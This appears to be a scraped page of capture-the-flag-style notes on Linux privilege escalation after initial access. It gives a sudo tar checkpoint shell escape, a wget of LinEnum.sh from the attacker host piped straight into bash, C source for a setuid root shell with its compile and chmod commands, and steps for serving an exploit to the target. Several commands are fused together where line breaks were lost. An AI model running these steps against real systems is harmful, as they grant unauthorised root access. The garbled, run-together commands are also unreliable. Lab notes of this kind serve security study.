Post Exploitation
Elevating Privileges
sudo -l 

Post Exploitation Enumeration


Last updated
sudo -l 



Last updated
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/shwget http://10.10.14.34:80/LinEnum.sh | bash$ locate backuper
/etc/systemd/system/multi-user.target.wants/backuperer.timer
/lib/systemd/system/backuperer.service
/lib/systemd/system/backuperer.timer
/usr/sbin/backuperer
#include <unistd.h>
int main()
{
setuid(0);
execl("/bin/bash", "bash", (char *)NULL);
return 0;
}gcc -m32 -o setuid setuid.cchmod u+s setuid
root@kali:/var/www/html# ls -l
total 776
-rw-r--r-- 1 root root 10701 May 8 2020 index.html
-rw-r--r-- 1 root root 612 May 8 2020 index.nginx-debian.html
-rwxr-xr-x 1 root root 46631 Oct 15 08:39 LinEnum.sh
-rw-r--r-- 1 root root 706130 Aug 24 17:17 Resume.pdf
-rwsr-xr-x 1 root root 15520 Nov 9 09:22 setuid
-rw-r--r-- 1 root root 110 Nov 9 09:18 setuid.c
-rw-r--r-- 1 root root 0 Aug 10 22:02 test.py
tar -zcvf exploit varattack machine: python -m SimpleHTTPServer 80
target machine: wget http://10.10.14.34:80/exploitsystemctl list-timers